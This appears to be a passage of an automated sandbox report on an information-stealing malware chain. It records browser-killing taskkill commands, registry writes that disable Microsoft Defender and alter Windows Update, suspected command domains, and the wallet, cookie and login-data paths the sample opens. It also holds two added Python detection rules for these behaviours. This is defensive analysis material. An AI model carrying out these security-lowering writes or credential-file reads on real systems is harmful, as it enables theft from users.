Source: file.exe, 00000000.00000003.2068472559.0000000004E60000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: eaglepawnoy.store
Source: file.exe, 00000000.00000003.2068472559.0000000004E60000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: mobbipenju.store
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe "C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe "C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe "C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000979001\num.exe "C:\Users\user\AppData\Local\Temp\1000979001\num.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: 2d569de7b1.exe, 0000000C.00000000.2915915173.0000000000D62000.00000002.00000001.01000000.00000010.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: QDDSFWH7TPMYGYIMIOWX7SBOU5.exe, 00000005.00000002.2419316485.0000000000C25000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: Program Manager
Source: skotes.exe, skotes.exe, 00000008.00000002.3336042883.00000000011D6000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: -TProgram Manager
Source: 7RNKVR1EZ552XQ73.exe, 7RNKVR1EZ552XQ73.exe, 00000004.00000002.2320028060.00000000006AB000.00000040.00000001.01000000.00000007.sdmp, 606f2f6db0.exe, 0000000A.00000002.2935241193.00000000004BB000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: Y~4Program Manager
Source: firefox.exe, 00000019.00000002.3156333371.0000002E515FB000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?Progman
Source: 976d9f40c1.exe, 00000009.00000002.2804424979.0000000001225000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: !Program Manager
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_00FFD3E2 cpuid 8_2_00FFD3E2
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000979001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000979001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_00FFCBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 8_2_00FFCBEA
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_00FE65E0 LookupAccountNameA, 8_2_00FE65E0
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
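The process-creation lines above show 2d569de7b1.exe (PID 7448) spawning taskkill /F /IM <browser> /T for firefox, chrome, msedge, opera and brave, twice each. The following is an added example and not part of this report or of the sandbox: a Python sliding-window rule that alerts when one parent process kills three or more distinct browsers within a minute, run over process-creation records written in Sysmon Event ID 1 style. The field names, the timestamps and the benign records are assumptions of the example; the browser list, the parent image and the PID come from the report.

```python
"""Detect one parent force-killing several browsers in quick succession.

Added example, not part of the sandbox report. The report records
2d569de7b1.exe (PID 7448) spawning "taskkill /F /IM <browser> /T" for
firefox, chrome, msedge, opera and brave, twice each. The process-creation
records below are constructed in Sysmon Event ID 1 style; field names,
timestamps and the benign records are assumptions of this example.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Set, Tuple

BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "opera.exe", "brave.exe"}
WINDOW = timedelta(seconds=60)   # look-back per parent process
MIN_DISTINCT = 3                 # distinct browsers killed inside WINDOW

# Only /IM is matched, deliberately: dropping /F or /T must not evade the rule.
_IM_RE = re.compile(r'(?:^|\s)/IM\s+"?([^\s"]+)"?', re.IGNORECASE)
Key = Tuple[int, str]            # (ParentProcessId, ParentImage)


@dataclass
class Alert:
    parent: str
    parent_pid: int
    first_seen: datetime
    browsers: Set[str]
    kills: int


def killed_image(cmdline: str) -> Optional[str]:
    """Lower-cased image named after /IM, or None for non-/IM taskkill forms."""
    m = _IM_RE.search(cmdline)
    return m.group(1).lower() if m else None


def parse_time(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")


def detect(events: List[dict]) -> List[Alert]:
    """Sliding-window rule: one parent, >= MIN_DISTINCT browsers, within WINDOW."""
    history: Dict[Key, List[Tuple[datetime, str]]] = defaultdict(list)
    counts: Dict[Key, int] = defaultdict(int)
    alerts: Dict[Key, Alert] = {}
    for e in sorted(events, key=lambda ev: ev["UtcTime"]):
        if not e["Image"].lower().endswith("\\taskkill.exe"):
            continue
        target = killed_image(e["CommandLine"])
        if target not in BROWSERS:
            continue
        t = parse_time(e["UtcTime"])
        key = (e["ParentProcessId"], e["ParentImage"])
        counts[key] += 1
        # keep only the kills that fall inside the look-back window for this parent
        hist = [(ht, hb) for ht, hb in history[key] if t - ht <= WINDOW]
        hist.append((t, target))
        history[key] = hist
        distinct = {hb for _, hb in hist}
        if len(distinct) < MIN_DISTINCT:
            continue
        if key not in alerts:
            alerts[key] = Alert(e["ParentImage"], key[0], hist[0][0], set(distinct), counts[key])
        else:  # keep the alert growing as further kills arrive
            alerts[key].browsers |= distinct
            alerts[key].kills = counts[key]
    return list(alerts.values())


def _proc(ts: str, parent: str, ppid: int, cmd: str) -> dict:
    return {"UtcTime": ts, "Image": r"C:\Windows\SysWOW64\taskkill.exe",
            "CommandLine": cmd, "ParentImage": parent, "ParentProcessId": ppid}


STEALER = r"C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe"
# Constructed sample: the ten kills from the report, one second apart, plus
# benign taskkill activity (assumed) that must not alert.
SAMPLE_EVENTS = [
    _proc(f"2024-10-23 10:00:{i:02d}.000", STEALER, 7448, f"taskkill /F /IM {b} /T")
    for i, b in enumerate(["firefox.exe", "chrome.exe", "msedge.exe", "opera.exe", "brave.exe"] * 2)
] + [
    _proc("2024-10-23 10:00:03.500", r"C:\Windows\explorer.exe", 1234, "taskkill /F /IM notepad.exe /T"),
    _proc("2024-10-23 10:01:00.000", r"C:\Windows\System32\cmd.exe", 5555, "taskkill /F /IM chrome.exe"),
    _proc("2024-10-23 10:06:00.000", r"C:\Windows\System32\cmd.exe", 5555, "taskkill /F /IM msedge.exe"),
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a.parent} (PID {a.parent_pid}) killed {sorted(a.browsers)} "
              f"{a.kills} times starting {a.first_seen:%H:%M:%S}")
```

The two cmd.exe kills in the sample are five minutes apart, so they never share a window and stay below the threshold; a single browser kill by an administrator is not worth an alert, a burst across several browsers from one unsigned temp-directory binary is.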

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Registry value created: TamperProtection 0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations Jump to behavior
Source: file.exe, 00000000.00000003.2167234333.0000000005A40000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
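The registry writes listed above turn off Defender real-time and IOAV scanning, silence Security Center notifications, zero Tamper Protection and alter Windows Update policy. The following is an added example and not part of this report or of the sandbox: a Python detection routine that flags exactly these writes in Sysmon Event ID 13 (registry value set) records. The event field names and the sample events are assumptions; the report does not state which key the TamperProtection value landed in, so the rule matches that value name under any key and the key path used in the sample event is likewise an assumption.

```python
"""Detect registry writes that lower Microsoft Defender / Windows Update policy.

Added example, not part of the sandbox report. The watch-list is built from
the policy values the report records QDDSFWH7TPMYGYIMIOWX7SBOU5.exe writing.
Input records imitate Sysmon Event ID 13 (RegistryEvent, value set); the
sample events below are constructed for this example, not taken from a host.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

DEFENDER = r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender"
SEC_CENTER = r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center"
WU = r"HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate"

# (key or None, value name, value that means "protection lowered" or None).
# key=None matches the value name under any key: the report shows the
# TamperProtection write but not the key it landed in, so we do not guess it.
# bad_value=None means any write is suspicious (the Windows Update values).
TAMPER_WATCHLIST: List[Tuple[Optional[str], str, Optional[int]]] = [
    (SEC_CENTER + r"\Notifications", "DisableNotifications", 1),
    (DEFENDER + r"\Real-Time Protection", "DisableIOAVProtection", 1),
    (DEFENDER + r"\Real-Time Protection", "DisableRealtimeMonitoring", 1),
    (None, "TamperProtection", 0),
    (WU + r"\AU", "AUOptions", None),
    (WU + r"\AU", "AutoInstallMinorUpdates", None),
    (WU, "DoNotConnectToWindowsUpdateInternetLocations", None),
]

_NUM_RE = re.compile(r"^(?:DWORD|QWORD) \((0x[0-9A-Fa-f]+)\)$")


@dataclass(frozen=True)
class Finding:
    image: str
    target: str
    value: Optional[int]
    reason: str


def parse_details(details: str) -> Optional[int]:
    """Sysmon renders numeric values as 'DWORD (0x00000001)'; return the int."""
    m = _NUM_RE.match(details.strip())
    return int(m.group(1), 16) if m else None


def evaluate(event: dict) -> Optional[Finding]:
    """Return a Finding if one SetValue event hits the watch-list, else None."""
    if event.get("EventType") != "SetValue":
        return None
    target = event["TargetObject"]
    key, _, name = target.rpartition("\\")
    value = parse_details(event.get("Details", ""))
    for watch_key, watch_name, bad_value in TAMPER_WATCHLIST:
        if name.lower() != watch_name.lower():
            continue
        if watch_key is not None and key.lower() != watch_key.lower():
            continue
        if bad_value is None:
            reason = f"{watch_name} written (any change to this policy value is suspicious)"
        elif value == bad_value:
            reason = f"{watch_name} set to {bad_value}"
        else:
            return None  # the watched value, but not the weakening setting
        return Finding(event.get("Image", "?"), target, value, reason)
    return None


def scan(events: List[dict]) -> List[Finding]:
    """Run evaluate() over a batch and keep the hits, preserving order."""
    return [f for f in (evaluate(e) for e in events) if f is not None]


def _ev(target: str, details: str,
        image: str = r"C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe") -> dict:
    return {"EventType": "SetValue", "Image": image, "TargetObject": target, "Details": details}


# Constructed sample: the seven writes from the report plus two benign writes.
# The TamperProtection key path is assumed for the sample; the rule ignores it.
SAMPLE_EVENTS = [
    _ev(SEC_CENTER + r"\Notifications\DisableNotifications", "DWORD (0x00000001)"),
    _ev(DEFENDER + r"\Real-Time Protection\DisableIOAVProtection", "DWORD (0x00000001)"),
    _ev(DEFENDER + r"\Real-Time Protection\DisableRealtimeMonitoring", "DWORD (0x00000001)"),
    _ev(r"HKLM\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection", "DWORD (0x00000000)"),
    _ev(WU + r"\AU\AUOptions", "DWORD (0x00000001)"),
    _ev(WU + r"\AU\AutoInstallMinorUpdates", "DWORD (0x00000000)"),
    _ev(WU + r"\DoNotConnectToWindowsUpdateInternetLocations", "DWORD (0x00000001)"),
    # benign: an administrator re-enabling real-time monitoring, and an unrelated key
    _ev(DEFENDER + r"\Real-Time Protection\DisableRealtimeMonitoring", "DWORD (0x00000000)",
        r"C:\Windows\System32\gpupdate.exe"),
    _ev(r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive",
        "C:\\Program Files\\OneDrive.exe", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.image}\n    {f.target} -> {f.value}: {f.reason}")
```

The Windows Update entries alert on any write because the report shows the values being created or modified without recording what they were set to; tighten them to specific values once the hosts you monitor have a known-good policy baseline.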

Stealing of Sensitive Information

Source: Yara match File source: 8.2.skotes.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.skotes.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.S14AV77TIR9DRWSCWIW0.exe.de0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000003.2321093178.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2361822309.0000000000FE1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2646773633.0000000005110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3335074148.0000000000FE1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2342431976.0000000000DE1000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2254811095.0000000005250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.3341551842.0000000001388000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 2d569de7b1.exe PID: 7448, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: file.exe PID: 5328, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 35.2.num.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.num.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.0.num.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.0.num.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.606f2f6db0.exe.e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.606f2f6db0.exe.e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.7RNKVR1EZ552XQ73.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001D.00000000.2977404002.0000000000481000.00000080.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2884674962.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2319704443.00000000002D1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3145991383.00000000000E1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.3221111651.0000000000481000.00000080.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3155884712.0000000000B5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.3081987586.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2936306936.000000000124E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.3235939586.0000000000481000.00000080.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2279367623.0000000004C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2934932135.00000000000E1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2993490502.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2992177721.0000000000481000.00000080.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2320903364.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.3237002232.0000000000D57000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 7RNKVR1EZ552XQ73.exe PID: 5628, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 606f2f6db0.exe PID: 8156, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\num[1].exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Source: file.exe, 00000000.00000003.2147845498.00000000010C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ,"p":"%appdata%\\Electrum\\wallets",
Source: file.exe, 00000000.00000003.2147845498.00000000010C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %\\com.liberty.jaxx\\Ind
Source: file.exe, 00000000.00000003.2147845498.00000000010D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.walletH
Source: file.exe String found in binary or memory: ExodusWeb3
Source: file.exe, 00000000.00000003.2147845498.00000000010C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe, 00000000.00000003.2147845498.00000000010C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
